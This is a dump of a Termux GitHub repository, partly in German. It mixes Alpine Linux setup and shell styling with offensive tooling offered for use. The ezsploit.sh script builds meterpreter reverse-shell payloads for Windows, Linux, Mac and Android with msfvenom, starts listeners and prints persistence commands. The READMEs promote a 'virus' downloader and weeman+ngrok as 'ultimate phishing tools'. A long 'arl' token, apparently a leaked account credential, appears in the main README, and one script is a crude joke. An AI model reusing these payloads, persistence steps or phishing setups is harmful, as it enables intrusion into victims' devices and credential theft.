├── 4Kyoutube-dl.md ├── Alpine ├── READ.MD ├── TermuxAlpine.sh ├── bash TermuxAlpinesh.md ├── docs │ └── images │ │ ├── alpinelinux-logo.svg │ │ ├── nomedia.me │ │ └── ss.png └── finaltouchup.sh ├── README.md ├── VirusMaker2019 ├── README.md └── v-maker.zip ├── ezsploit ├── README.md └── ezsploit.sh ├── metasploit2019 ├── README.md └── metasploit.zip ├── mutterficker.sh ├── ngrok ├── style ├── README.md ├── bash.bashrc ├── bash.zip └── optik.sh ├── sudo ├── READ.me └── sudo ├── sudogottmodus.sh ├── weeman ├── .gitignore ├── ChangeLog ├── LICENSE ├── README.md ├── contributors.txt ├── core │ ├── __init__.py │ ├── complete.py │ ├── config.py │ ├── httpd.py │ ├── logo.txt │ ├── misc.py │ ├── shell.py │ └── weeman_curr.png ├── lib │ ├── __init__.py │ └── bs4 │ │ ├── COPYING.txt │ │ ├── __init__.py │ │ ├── builder │ │ ├── 0.txt │ │ ├── __init__.py │ │ ├── _html5lib.py │ │ ├── _htmlparser.py │ │ └── _lxml.py │ │ ├── dammit.py │ │ ├── diagnose.py │ │ ├── element.py │ │ └── testing.py ├── modules │ ├── 0.txt │ ├── email.py │ ├── extract_links.py │ ├── is_website_up.py │ └── whois_ip.py ├── profiles │ ├── 0.txt │ ├── localhost.profile │ └── mobile_localhost.profile ├── tools │ ├── 0.txt │ └── switch_ip_forward.sh └── weeman.py └── yotube Copie all to script.md /4Kyoutube-dl.md: -------------------------------------------------------------------------------- 1 | > YouTube Downloader für Termux 2 | videos bis zu 4k können seit dem letzen update 3 | gedownloadet werden 4 | 5 | _______ 6 | Type or copy these commands one by one 7 | _________ 8 | 9 | # apt update && apt -y upgrade 10 | 11 | # termux-setup-storage 12 | 13 | # pkg install -y python 14 | 15 | # pkg install -y python2 16 | 17 | # pip install youtube-dl 18 | 19 | # mkdir ~/storage/shared/youtube 20 | 21 | # mkdir -p ~/.config/youtube-dl 22 | 23 | # pkg install -y ffmpeg 24 | 25 | # mkdir ~/bin 26 | 27 | # wget http://pastebin.com/raw/DVVjQMfZ -O ~/bin/termux-url-opener 28 | 29 | # dos2unix ~/bin/termux-url-opener 30 | 31 | 32 | teile youtube videos jetzt mit termux, 33 | und du kannst dir aussuchen in welcher ausflösung du das video bekommst 34 | (nur mp3 und bis zu 4k sind möglich !!) 35 | -------------------------------------------------------------------------------- /Alpine/READ.MD: -------------------------------------------------------------------------------- 1 | 2 | bash TermuxAlpine.sh 3 | 4 | startalpine 5 | -------------------------------------------------------------------------------- /Alpine/TermuxAlpine.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GottModusTermux/G0D/b3661e3b30b7d0deb9e26bef2c1951837be9c13b/Alpine/TermuxAlpine.sh -------------------------------------------------------------------------------- /Alpine/bash TermuxAlpinesh.md: -------------------------------------------------------------------------------- 1 | # TermuxAlpine 2 | 3 | #### _powered by_ 4 | 5 | ![powered by Alpine](../master/docs/images/alpinelinux-logo.svg) 6 | 7 | ![Optional Text](../master/docs/images/ss.png) 8 | 9 | 10 | This Termux bash setup shell script will attempt to set Alpine Linux up in your Termux environment. 11 | 12 | ## _Steps For Installation_ 13 | 1. First goto home directory 14 | `cd $HOME` 15 | 2. Get the script 16 | `curl -LO https://raw.githubusercontent.com/Hax4us/TermuxAlpine/master/TermuxAlpine.sh` 17 | 3. Execute the script 18 | `bash TermuxAlpine.sh` 19 | 4. Start Alpine 20 | `startalpine` 21 | 5. For exit just execute 22 | `exit` 23 | 24 | ## _Steps For First Time Use (Recommended)_ 25 | 1. Update Alpine 26 | `apk update` 27 | 2. Now you can install any package by 28 | `apk add package_name` 29 | 30 | ## Size Comparision 31 | Size  | Alpine  | Arch | Ubuntu 32 | --- | --- | --- | --- 33 | before installation | Around 1 MB 😱  | Around 400 MB | Around 35 MB 34 | after installation | Around 80 MB | Around 2000 MB | Around 1200 MB 35 | 36 | #### here is full usage details of apk https://wiki.alpinelinux.org/wiki/Alpine_Linux_package_management 37 | 38 | 39 | Comments are welcome at https://github.com/Hax4us/TermuxAlpine/issues ✍ 40 | 41 | Pull requests are welcome https://github.com/Hax4us/TermuxAlpine/pulls ✍ 42 | -------------------------------------------------------------------------------- /Alpine/docs/images/alpinelinux-logo.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | image/svg+xml -------------------------------------------------------------------------------- /Alpine/docs/images/nomedia.me: -------------------------------------------------------------------------------- 1 | nomedia 2 | -------------------------------------------------------------------------------- /Alpine/docs/images/ss.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GottModusTermux/G0D/b3661e3b30b7d0deb9e26bef2c1951837be9c13b/Alpine/docs/images/ss.png -------------------------------------------------------------------------------- /Alpine/finaltouchup.sh: -------------------------------------------------------------------------------- 1 | #!/data/data/com.termux/files/usr/bin/bash 2 | addprofile() 3 | { 4 | cat > $HOME/TermuxAlpine/etc/profile <<- EOM 5 | export CHARSET=UTF-8 6 | export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 7 | export PAGER=less 8 | export PS1='[termux@alpine \W]\\$ ' 9 | umask 022 10 | for script in /etc/profile.d/*.sh ; do 11 | if [ -r \$script ] ; then 12 | . \$script 13 | fi 14 | done 15 | EOM 16 | } 17 | 18 | addmotd() { 19 | cat > $HOME/TermuxAlpine/etc/profile.d/motd.sh <<- EOM 20 | printf "\n\033[1;34mWelcome to Alpine Linux in Termux! Enjoy!\033[0m\033[1;34m 21 | Chat: \033[0m\033[mhttps://gitter.im/termux/termux/\033[0m\033[1;34m 22 | Help: \033[0m\033[34minfo \033[0m\033[mand \033[0m\033[34mman \033[0m\033[1;34m 23 | Portal: \033[0m\033[mhttps://wiki.termux.com/wiki/Community\033[0m\033[1;34m 24 | 25 | Install a package: \033[0m\033[34mapk add \033[0m\033[1;34m 26 | More information: \033[0m\033[34mapk --help\033[0m\033[1;34m 27 | Search packages: \033[0m\033[34mapk search \033[0m\033[1;34m 28 | Upgrade packages: \033[0m\033[34mapk upgrade \n\033[0m \n" 29 | EOM 30 | } 31 | 32 | updrepos() { 33 | cp $HOME/TermuxAlpine/etc/apk/repositories $HOME/TermuxAlpine/etc/apk/repositories.bak 34 | cat > $HOME/TermuxAlpine/etc/apk/repositories <<- EOM 35 | http://dl-cdn.alpinelinux.org/alpine/latest-stable/main/ 36 | http://dl-cdn.alpinelinux.org/alpine/latest-stable/community/ 37 | http://dl-cdn.alpinelinux.org/alpine/edge/testing/ 38 | EOM 39 | } 40 | # thnx to @j16180339887 for DNS picker 41 | #addresolvconf () 42 | #{ 43 | # [ $(command -v getprop) ] && getprop | sed -n -e 's/^\[net\.dns.\]: \[\(.*\)\]/\1/p' | sed '/^\s*$/d' | sed 's/^/nameserver /' > $HOME/TermuxAlpine/etc/resolv.conf 44 | #} 45 | 46 | addprofile 47 | addmotd 48 | #addresolvconf 49 | updrepos 50 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # G0D on Termux 2 | all for full Termux 3 | Ultimate Linux Terminal on Android 4 | 5 | # https://youtu.be/YK9D5IPNU_o 6 | Update Januar 2020 !! 7 | install (fast) sudo on Termux for a "full Linux Terminal" 8 | 9 | Alpine = miniOS for Termux . 10 | 11 | VirusMaker2019 = "Malicious" best virus downloader(for MacOS,LinuxAndroid,Windows) . 12 | 13 | ezsploit = one easy way to create payload . 14 | 15 | metasploit2019 = metasploit installer TuT for Dummies . 16 | 17 | style = make your Termux to YOUR Termux . 18 | 19 | ! sudo = "superuser do" install first ! root is in "sudo", but no "sudo"is in "root" 20 | 21 | 22 | weeman +ngrok = ultimate phishing tools . 23 | __________ 24 | 25 | # SUPERUSER DO !! aka. SUDO** first install sudo before we run more programs & tools 26 | 27 | SUDO not full work on Magisk !! Root your smartphone with SuperSU 28 | 29 | follow the next steps for SUDO** 30 | 31 | ---------- 32 | 33 | # $download& install via GitHub (without ZIP) 34 | 35 | # Copy&Paste the next commandos: 36 | 37 | > termux-setup-storage 38 | 39 | > apt update -y && apt upgrade -y 40 | 41 | > apt install git -y 42 | 43 | > pkg install ncurses-utils 44 | 45 | > git clone https://github.com/GottModusTermux/G0D.git && cd G0D/sudo 46 | 47 | > apt install fish -y && fish 48 | 49 | > cat sudo > /data/data/com.termux/files/usr/bin/sudo 50 | 51 | > chmod 700 /data/data/com.termux/files/usr/bin/sudo 52 | 53 | > exit 54 | 55 | > sudo 56 | ____ 57 | 58 | # $import "G0D-master.zip" in your Termux 59 | 60 | For example, if the ZIP is in your /0/Download/ folder, 61 | 62 | # Copy&Paste the next commands: 63 | 64 | > termux-setup-storage 65 | 66 | > cd storage/downloads/ 67 | 68 | > cp -f G0D-master.zip $HOME 69 | 70 | > cd 71 | 72 | > pkg install zip -y 73 | 74 | > unzip G0D-master.zip 75 | 76 | > cd G0D-master/sudo 77 | 78 | > apt update -y && apt upgrade -y 79 | 80 | > pkg install ncurses-utils 81 | 82 | > apt install fish -y && fish 83 | 84 | > cat sudo > /data/data/com.termux/files/usr/bin/sudo 85 | 86 | > chmod 700 /data/data/com.termux/files/usr/bin/sudo 87 | 88 | > exit 89 | 90 | > sudo 91 | 92 | # #GottModusTermux 93 | 94 | SUDO** (superuser do) is a utility for UNIX- and Linux-based systems 95 | 96 | that provides an efficient way to give specific users permission to use specific system ... 97 | 98 | GottModusTermux <--- 99 | 100 | 101 | arl for freezer: 102 | 9d9946763d3f5160bc70ef45013475470f2d33b4dbf52cdd4b0b15c2c2226f357e684b354bbe174292b37b03e127fb434ffffad7e3b8bccfe89e3b4c747de42b93985b137461ce6cccf2a13d52b98ded5fe2de6b19fb50f4f220d682a7b07a74 103 | -------------------------------------------------------------------------------- /VirusMaker2019/README.md: -------------------------------------------------------------------------------- 1 | # Virus-Maker "Malicious" 2 | (for Linux,Windows,MacOS,Android) 3 | 4 | termux-setup-storage 5 | 6 | pkg install python2 7 | 8 | git clone https://github.com/GottModusTermux/G0D.git 9 | 10 | cd /G0D/VirusMaker2019/ 11 | 12 | unzip v-maker.zip 13 | 14 | cd v-maker 15 | 16 | pip2 install -r requirements.txt 17 | 18 | python2 malicious.py 19 | 20 | > after download virus open your file explorer 21 | > find folder Malicious and open it 22 | > chose and open folder Android if you download virus Android 23 | __________ 24 | # https://t.me/joinchat/KCZWlxJt2j87ZuuXLocKSA 25 | Termux Telegram Gruppe GER-Unterstützung 26 | 27 | https://www.youtube.com/channel/UCH2Qr1wpHMNBChgyusqjpLg?view_as=subscriber 28 | -------------------------------------------------------------------------------- /VirusMaker2019/v-maker.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GottModusTermux/G0D/b3661e3b30b7d0deb9e26bef2c1951837be9c13b/VirusMaker2019/v-maker.zip -------------------------------------------------------------------------------- /ezsploit/README.md: -------------------------------------------------------------------------------- 1 | # First install TSU &Metasploit 2 | [https://youtu.be/B_49pqaXpAs ..Metasploit error free 3 | https://github.com/GottModusTermux/G0D/tree/master/metasploit2019] 4 | 5 | Command line script for automating metasploit functions 6 | 7 | folgende befehle: 8 | 9 | pkg install tsu -y 10 | cd G0D/ezsploit/ 11 | chmod +x * 12 | tsu 13 | bash ezsploit.sh 14 | 15 | __________ 16 | - Checks for metasploit service and starts if not present 17 | - Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android $ 18 | - Start multiple meterpreter reverse_tcp listners 19 | - Assistance with building basic persistence options and scripts 20 | - Armitage launcher 21 | - Drop into Msfconsole 22 | - Some other fun stuff :) 23 | 24 | ------------------------------------------ 25 | 26 | To-Do 27 | 28 | Add more functions to payloads/listners, java, php, tomcat etc 29 | 30 | Improve overall functionality 31 | 32 | # https://t.me/joinchat/KCZWlxJt2j87ZuuXLocKSA 33 | >Termux Telegram Gruppe GER-Unterstützung 34 | -------------------------------------------------------------------------------- /ezsploit/ezsploit.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # etc etc etc 3 | # .................. 4 | [[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; } 5 | resize -s 30 60 6 | clear # Clear the screen. 7 | SERVICE=service; 8 | 9 | if ps ax | grep -v grep | grep metasploit > /dev/null 10 | then 11 | echo "$SERVICE service running" 12 | else 13 | echo "$SERVICE is not running, Starting service." 14 | sudo service metasploit start 15 | fi 16 | mkdir ~/Desktop/temp 17 | clear 18 | clear 19 | echo -e "\E[1;33m:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" 20 | echo -e "\E[1;33m:::::::::::::: \e[97mMetasploit service started \E[1;33m:::::::::::::::::" 21 | echo -e "\E[1;33m:::::: \e[97mScripts and payloads saved to ~/Desktop/temp/ \E[1;33m::::::" 22 | echo -e "\E[1;33m:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" 23 | read -p "Press [Enter] key to Continue..." 24 | clear 25 | echo -e "\E[1;33m:::::::::::::: \e[97mMetasploit automation script \E[1;33m:::::::::::::::" 26 | echo -e "\e[97m ______ 27 | .- -. 28 | / \ by rand0m1ze 29 | \e[94m* \e[97m \e[90m* \e[97m 30 | |, .-. .-. ,| \e[32m* \e[97m 31 | | )(_ / \_ )( | 32 | |/ /\ \| \e[34m* \e[97m 33 | (@_ <__ ^^ __> \e[95m* \e[97m 34 | _ ) \_______\__|IIIIII|__/____________\e[31m___________ \e[97m 35 | (_)\e[31m@8@8\e[97m{}<________\e[31m_____\e[97m_____________\e[31m___________________> \e[97m 36 | )_/ \ IIIIII / \e[31m::::: \e[97m 37 | (@ -------- \e[31m:: \e[97m 38 | " 39 | tput sgr0 # 40 | echo -e "\e[31m_________________________[ \e[97mSELECT AN OPTION TO BEGIN \e[31m]" 41 | echo -e "\E[1;33m::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" 42 | echo -e "\E[1;33m:::\e[97m[1] \e[90mPayload \e[97m [Create a payload with msvenom] \E[1;33m" 43 | tput sgr0 # Reset colors to "normal." 44 | echo -e "\E[1;33m:::\e[97m[2] \e[32mListen \e[97m [Start a multi handler] \E[1;33m" 45 | tput sgr0 46 | echo -e "\E[1;33m:::\e[97m[3] \e[34mExploit \e[97m [Drop into msfconsole]\E[1;33m" 47 | tput sgr0 48 | echo -e "\E[1;33m:::\e[97m[4] \e[95mPersistence \e[97m [Forge a Persistence script] \E[1;33m" 49 | tput sgr0 50 | echo -e "\E[1;33m:::\e[97m[5] \e[31mArmitage \e[97m [Launch Armitage GUI] \E[1;33m" 51 | tput sgr0 52 | echo -e "\E[1;33m:::\e[97m[X] \e[32mHack The Gibson \e[97m [Hac/< The P1aneT] \E[1;33m" 53 | tput sgr0 # Reset attributes. 54 | echo -e "\E[1;33m::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" 55 | echo -e "\e[97m~~~~~~~~~~~~~~~~~~~~ \e[31mGreetz to the 2600 \e[97m~~~~~~~~~~~~~~~~~~~~\e[31m" 56 | tput sgr0 57 | 58 | 59 | read options 60 | 61 | case "$options" in 62 | # Note variable is quoted. 63 | 64 | "1" | "1" ) 65 | # Accept upper or lowercase input. 66 | echo -e "\E[1;33m::::: \e[97mLets Craft a PAYLOAD\E[1;33m:::::" 67 | 68 | PS3='Enter your choice 6=QUIT: ' 69 | options=("Windows" "Linux" "Mac" "Android" "List_All" "Quit") 70 | select opt in "${options[@]}" 71 | do 72 | case $opt in 73 | "Windows") 74 | read -p 'Set LHOST IP: ' uservar; read -p 'Set LPORT: ' userport 75 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=$uservar LPORT=$userport -f exe > ~/Desktop/temp/shell.exe 76 | echo -e "\E[1;33m::::: \e[97mshell.exe saved to ~/Desktop/temp\E[1;33m:::::" 77 | ;; 78 | "Linux") 79 | read -p 'Set LHOST IP: ' uservar; read -p 'Set LPORT: ' userport 80 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$uservar LPORT=$userport -f elf > ~/Desktop/temp/shell.elf 81 | echo -e "\E[1;33m::::: \e[97mshell.elf saved to ~/Desktop/temp\E[1;33m:::::" 82 | ;; 83 | "Mac") 84 | read -p 'Set LHOST IP: ' uservar; read -p 'Set LPORT: ' userport 85 | msfvenom -p osx/x86/shell_reverse_tcp LHOST=$uservar LPORT=$userport -f macho > ~/Desktop/temp/shell.macho 86 | echo -e "\E[1;33m::::: \e[97mshell.macho saved to ~/Desktop/temp\E[1;33m:::::" 87 | ;; 88 | "Android") 89 | read -p 'Set LHOST IP: ' uservar; read -p 'Set LPORT: ' userport 90 | msfvenom -p android/meterpreter/reverse_tcp LHOST=$uservar LPORT=$userport R > ~/Desktop/temp/shell.apk 91 | echo -e "\E[1;33m::::: \e[97mshell.apk saved to ~/Desktop/temp\E[1;33m:::::" 92 | ;; 93 | "List_All") 94 | xterm -e msvenom -l & 95 | ;; 96 | "Quit") 97 | echo "Good Bye" && break 98 | ;; 99 | *) echo invalid option;; 100 | esac 101 | done 102 | ;; 103 | 104 | "2" | "2" ) 105 | echo -e "\E[1;33m::::: \e[97mLets Craft a LISTNER\E[1;33m:::::" 106 | 107 | PS3='Enter your choice 6=QUIT: ' 108 | options=("Windows" "Linux" "Mac" "Android" "List_All" "Quit") 109 | select opt in "${options[@]}" 110 | do 111 | case $opt in 112 | "Windows") 113 | touch ~/Desktop/temp/meterpreter.rc 114 | echo use exploit/multi/handler > ~/Desktop/temp/meterpreter.rc 115 | echo set PAYLOAD windows/meterpreter/reverse_tcp >> ~/Desktop/temp/meterpreter.rc 116 | read -p 'Set LHOST IP: ' uservar 117 | echo set LHOST $uservar >> ~/Desktop/temp/meterpreter.rc 118 | read -p 'Set LPORT: ' uservar 119 | echo set LPORT $uservar >> ~/Desktop/temp/meterpreter.rc 120 | echo set ExitOnSession false >> ~/Desktop/temp/meterpreter.rc 121 | echo exploit -j -z >> ~/Desktop/temp/meterpreter.rc 122 | cat ~/Desktop/temp/meterpreter.rc 123 | xterm -e msfconsole -r ~/Desktop/temp/meterpreter.rc & 124 | ;; 125 | "Linux") 126 | touch ~/Desktop/temp/meterpreter_linux.rc 127 | echo use exploit/multi/handler > ~/Desktop/temp/meterpreter_linux.rc 128 | echo set PAYLOAD linux/x86/meterpreter/reverse_tcp >> ~/Desktop/temp/meterpreter_linux.rc 129 | read -p 'Set LHOST IP: ' uservar 130 | echo set LHOST $uservar >> ~/Desktop/temp/meterpreter_linux.rc 131 | read -p 'Set LPORT: ' uservar 132 | echo set LPORT $uservar >> ~/Desktop/temp/meterpreter_linux.rc 133 | echo set ExitOnSession false >> ~/Desktop/temp/meterpreter_linux.rc 134 | echo exploit -j -z >> ~/Desktop/temp/meterpreter_linux.rc 135 | cat ~/Desktop/temp/meterpreter_linux.rc 136 | xterm -e msfconsole -r ~/Desktop/temp/meterpreter_linux.rc & 137 | exit 138 | ;; 139 | "Mac") 140 | touch ~/Desktop/temp/meterpreter_mac.rc 141 | echo use exploit/multi/handler > ~/Desktop/temp/meterpreter_mac.rc 142 | echo set PAYLOAD osx/x86/shell_reverse_tcp >> ~/Desktop/temp/meterpreter_mac.rc 143 | read -p 'Set LHOST IP: ' uservar 144 | echo set LHOST $uservar >> ~/Desktop/temp/meterpreter_mac.rc 145 | read -p 'Set LPORT: ' uservar 146 | echo set LPORT $uservar >> ~/Desktop/temp/meterpreter_mac.rc 147 | echo set ExitOnSession false >> ~/Desktop/temp/meterpreter_mac.rc 148 | echo exploit -j -z >> ~/Desktop/temp/meterpreter_mac.rc 149 | cat ~/Desktop/temp/meterpreter_mac.rc 150 | xterm -e msfconsole -r ~/Desktop/temp/meterpreter_mac.rc & 151 | ;; 152 | "Android") 153 | touch ~/Desktop/temp/meterpreter_droid.rc 154 | echo use exploit/multi/handler > ~/Desktop/temp/meterpreter_droid.rc 155 | echo set PAYLOAD osx/x86/shell_reverse_tcp >> ~/Desktop/temp/meterpreter_droid.rc 156 | read -p 'Set LHOST IP: ' uservar 157 | echo set LHOST $uservar >> ~/Desktop/temp/meterpreter_droid.rc 158 | read -p 'Set LPORT: ' uservar 159 | echo set LPORT $uservar >> ~/Desktop/temp/meterpreter_droid.rc 160 | echo set ExitOnSession false >> ~/Desktop/temp/meterpreter_droid.rc 161 | echo exploit -j -z >> ~/Desktop/temp/meterpreter_droid.rc 162 | cat ~/Desktop/temp/meterpreter_droid.rc 163 | xterm -e msfconsole -r ~/Desktop/temp/meterpreter_droid.rc & 164 | ;; 165 | "List_All") 166 | touch ~/Desktop/temp/payloads.rc 167 | echo show payloads > ~/Desktop/temp/payloads.rc 168 | cat ~/Desktop/temp/payloads.rc 169 | xterm -e msfconsole -r ~/Desktop/temp/payloads.rc & 170 | ;; 171 | "Quit") 172 | echo "Good Bye" && break 173 | ;; 174 | *) echo invalid option;; 175 | esac 176 | done 177 | ;; 178 | 179 | "3" | "3" ) 180 | # Accept upper or lowercase input. 181 | echo -e "\E[1;33m::::: \e[97mStarting Metasploit \E[1;33m:::::" 182 | msfconsole 183 | use exploit/multi/handler 184 | 185 | ;; 186 | 187 | 188 | "4" | "4" ) 189 | # 190 | echo -e "\E[1;33m::::: \e[97mPersistence Generator \E[1;33m:::::" 191 | PS3='Enter your choice 5=QUIT: ' 192 | options=("Windows" "Linux" "Mac" "Android" "Quit") 193 | select opt in "${options[@]}" 194 | do 195 | case $opt in 196 | "Windows") 197 | read -p 'Set LHOST IP: ' uservar; read -p 'Set LPORT: ' userport 198 | echo -e "\E[1;33m::::: \e[97mrun persistence -U -X 30 -p $userport -r $uservar\E[1;33m:::::" 199 | ;; 200 | "Linux") 201 | echo -e "\E[1;33m::::: \e[97mGet creative here :)\E[1;33m:::::" 202 | ;; 203 | "Mac") 204 | echo 'Using directory /Applications/Utilities/' 205 | read -p 'Enter payload file name :example *shell.macho: ' uservar; 206 | echo -e "\E[1;33m::::: \e[97mdefaults write /Library/Preferences/loginwindow AutoLaunchedApplicationDictionary -array-add ‘{Path=”/Applications/Utilities/$uservar”;}’\E[1;33m:::::" 207 | ;; 208 | "Android") 209 | touch ~/Desktop/temp/android.sh 210 | echo \#\!/bin/bash >> ~/Desktop/temp/android.sh 211 | echo while : >> ~/Desktop/temp/android.sh 212 | echo do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity >> ~/Desktop/temp/android.sh 213 | echo sleep 20 >> ~/Desktop/temp/android.sh 214 | echo done >> ~/Desktop/temp/android.sh 215 | cat ~/Desktop/temp/android.sh 216 | echo -e "\E[1;33m::::: \e[97mandroid.sh saved to ~/Desktop/temp. Upload to / on device\E[1;33m:::::" 217 | ;; 218 | "Quit") 219 | echo "Good Bye" && break 220 | ;; 221 | *) echo invalid option;; 222 | esac 223 | done 224 | ;; 225 | 226 | "5" | "5" ) 227 | # 228 | echo -e "\E[1;33m::::: \e[97mArmitage Launcher \E[1;33m:::::" 229 | echo "armitage should be in /opt/armitage" 230 | echo -e "\E[1;33m::::: \e[97mLaunching...\E[1;33m:::::" 231 | xterm -e sudo java -jar /opt/armitage/armitage.jar & 232 | 233 | ;; 234 | 235 | "x" | "x" ) 236 | clear 237 | echo We have a Zero Bug attacking all the login and 238 | echo overlay files. 239 | echo PLAGUE 240 | echo Run anti-virus. Give me a systems display! 241 | echo 242 | echo The systems display comes up. Red flashes everywhere, 243 | echo signifying new attacks. Plague presses a key. 244 | echo 245 | echo PLAGUE 246 | echo Die, dickweeds! 247 | echo 248 | echo HAL 249 | echo The rabbit is in the administration system. 250 | echo 251 | echo Rabbit icons start to fill the systems display. 252 | echo 253 | echo PLAGUE 254 | echo Send a Flu-shot. 255 | echo 256 | echo MARGO 257 | echo Rabbit, Flu-shot, someone talk to me. 258 | echo 259 | echo HAL 260 | echo A rabbit replicates till it overloads a file, 261 | echo then it spreads like cancer. 262 | echo -e "\e[31m[Owning Gibson / Please wait...\e[31m]" 263 | echo -ne '##### (33%)\r' 264 | sleep 3 265 | echo -ne '############# (66%)\r' 266 | sleep 3 267 | echo -ne '####################### (100%)\r' 268 | echo -ne '\n' 269 | echo Stager sent! Starting session.. .... 270 | echo root@Gibson~# 271 | 272 | 273 | ;; 274 | 275 | * ) 276 | # Default option. 277 | # 278 | echo 279 | echo "Not yet in database." 280 | ;; 281 | 282 | esac 283 | 284 | tput sgr0 # Reset colors to "normal." 285 | 286 | echo 287 | 288 | exit 0 289 | -------------------------------------------------------------------------------- /metasploit2019/README.md: -------------------------------------------------------------------------------- 1 | # Metasploit "ERROR FREE" on Termux 2 | 3 | git clone https://github.com/GottModusTermux/G0D.git 4 | 5 | pkg install unzip -y 6 | 7 | cd G0D/metasploit2019/ 8 | 9 | unzip metasploit.zip 10 | 11 | cd metasploit 12 | 13 | pip install bundler 14 | 15 | pip install bundle 16 | 17 | gem install bundler 18 | 19 | chmod +x * 20 | 21 | bash metasploit.sh 22 | ____ 23 | 24 | cd 25 | 26 | cd metasploit-framework 27 | 28 | msfconsole 29 | 30 | # https://t.me/joinchat/KCZWlxJt2j87ZuuXLocKSA 31 | >Termux Telegram Gruppe GER-Unterstützung 32 | 33 | https://youtu.be/B_49pqaXpAs <--Tutorial 34 | Hier habe ich ein Video für euch hochgeladen, 35 | um euch zu zeigen wie die Installertion durchgeführt wird, 36 | und anschließend "Metasploit" gestartet wird. 37 | 38 | Letzter Test:09.dez.2018 39 | mit meiner Anleitung, gibt es keine Fehler 40 | -------------------------------------------------------------------------------- /metasploit2019/metasploit.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GottModusTermux/G0D/b3661e3b30b7d0deb9e26bef2c1951837be9c13b/metasploit2019/metasploit.zip -------------------------------------------------------------------------------- /mutterficker.sh: -------------------------------------------------------------------------------- 1 | #!/data/data/com.termux/files/usr/bin/bash -e 2 | 3 | # colors 4 | 5 | red='\033[1;31m' 6 | reset='\033[0m' 7 | 8 | printf "$red" 9 | echo "MutterFick prozess gestartet.." 10 | 11 | sleep 2 12 | echo 13 | echo 14 | echo 15 | echo "start" 16 | echo 17 | sleep 3 18 | echo "1%" 19 | sleep 2 20 | echo "3%" 21 | sleep 3 22 | echo "7%" 23 | sleep 1 24 | echo "12%" 25 | sleep 1 26 | echo "24%" 27 | sleep 4 28 | echo "64%" 29 | sleep 2 30 | echo "81%" 31 | sleep 1 32 | echo "92%" 33 | sleep 1 34 | echo "100%" 35 | sleep 2 36 | echo 37 | echo "Fertig !!" 38 | printf "$reset" 39 | 40 | sleep 3 41 | 42 | clear 43 | echo 44 | echo 45 | echo 46 | 47 | printf "$red" 48 | echo "Gratulation.." 49 | sleep 2 50 | echo 51 | echo 52 | echo "Mütter wurden erfolgreich gefickt" 53 | sleep 3 54 | echo 55 | echo 56 | echo 57 | echo "MutterFick prozess erfolgreich durchgefürht !!" 58 | printf "$reset" 59 | sleep 7 60 | clear 61 | 62 | ls 63 | 64 | exit 65 | -------------------------------------------------------------------------------- /ngrok: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GottModusTermux/G0D/b3661e3b30b7d0deb9e26bef2c1951837be9c13b/ngrok -------------------------------------------------------------------------------- /style/README.md: -------------------------------------------------------------------------------- 1 | experimental style beta test: 2 | 3 | cd 4 | cd .. 5 | cd usr/etc 6 | nano bash.bashrc 7 | 8 | PS1='\033[1;91mroot@$$$$[\033[1;93m\W\033[1;91m]: \033[1;92m' 9 | 10 | ...in einer neuen Zeile einfügen im Editor beim geöffnetem Dokument 11 | speichern.. termux neu starten 12 | kein download erfoderlich 13 | 14 | 15 | 16 | >GitHub: https://github.com/GottModusTermux/ 17 | 18 | - cd G0D 19 | 20 | - cp bash.zip $HOME && cd 21 | 22 | - ls 23 | 24 | - unzip bash.zip 25 | 26 | - pkg install nano -y && pkg install figlet -y && pkg install toilet 27 | 28 | - cd .. 29 | 30 | - ls 31 | 32 | - cd usr/etc 33 | 34 | - ls -a 35 | 36 | - rm motd 37 | 38 | - nano bash.bashrc 39 | 40 | 41 | eines der folgenden Zeilen in das geöffnete Dokument 42 | (nano bash.bashrc) einfügen: 43 | 44 | >1. figlet -f slant $$$$ 45 | >2. toilet $$$$ --metal 46 | 47 | 48 | die Geldzeichen [$$$$] gegen ein Wort deiner Wahl austauschen, 49 | schon wird es dir bei jedem Start als Titel-logo angezeigt 50 | 51 | "Welcome to Termux.. pkg search .. pkg upgrade/update" 52 | ...dieser Text wird mit deinem ersetzt ;) 53 | Allgemein ändern sich nun auch die farben vom Interface 54 | (schriften, ordner 55 | 56 | Hier hab ich euch mal ein Video hochgeladen, 57 | wie das ganze durchgeführt wird, 58 | und wie das ganze dann aussieht. 59 | 60 | >https://www.youtube.com/watch?v=xzL-B5poIv4&t=57s&app=desktop 61 | 62 | __________ 63 | # https://t.me/joinchat/KCZWlxJt2j87ZuuXLocKSA 64 | >Termux Telegram Gruppe GER-Unterstützung 65 | -------------------------------------------------------------------------------- /style/bash.bashrc: -------------------------------------------------------------------------------- 1 | command_not_found_handle() { 2 | /data/data/com.termux/files/usr/libexec/termux/command-not-found "$1" 3 | } 4 | 5 | figlet -f slant g0d- 6 | figlet -f slant m0de 7 | 8 | PS1='\[\e[31m\]┌─[\[\e[37m\]\T\[\e[31m\]]───\e[1;98m[@g0d-m0de]\e[0;31m───[\#]\n|\n\e[0;31m└─[\[\e[31m\]\e[0;35m\W\ 9 | [\e[31m\]]───►\e[1;93m' 10 | -------------------------------------------------------------------------------- /style/bash.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GottModusTermux/G0D/b3661e3b30b7d0deb9e26bef2c1951837be9c13b/style/bash.zip -------------------------------------------------------------------------------- /style/optik.sh: -------------------------------------------------------------------------------- 1 | #!/data/data/com.termux/files/usr/bin/bash -e 2 | 3 | pkg install figlet -y 4 | rm /data/data/com.termux/files/usr/etc/bash.bashrc 5 | cp bash.bashrc /data/data/com.termux/files/usr/etc 6 | rm 